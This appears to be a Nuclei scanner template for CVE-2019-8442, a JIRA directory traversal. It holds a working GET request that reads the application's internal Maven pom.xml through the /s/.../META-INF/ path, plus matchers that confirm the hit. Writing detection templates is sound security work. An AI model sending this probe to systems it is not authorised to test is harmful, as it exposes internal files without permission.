nuclei-templates/cves/2019/CVE-2019-8442.yaml

20 lines
457 B
YAML

id: CVE-2019-8442
info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
requests:
- method: GET
path:
- >-
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <groupId>com.atlassian.jira</groupId>
part: body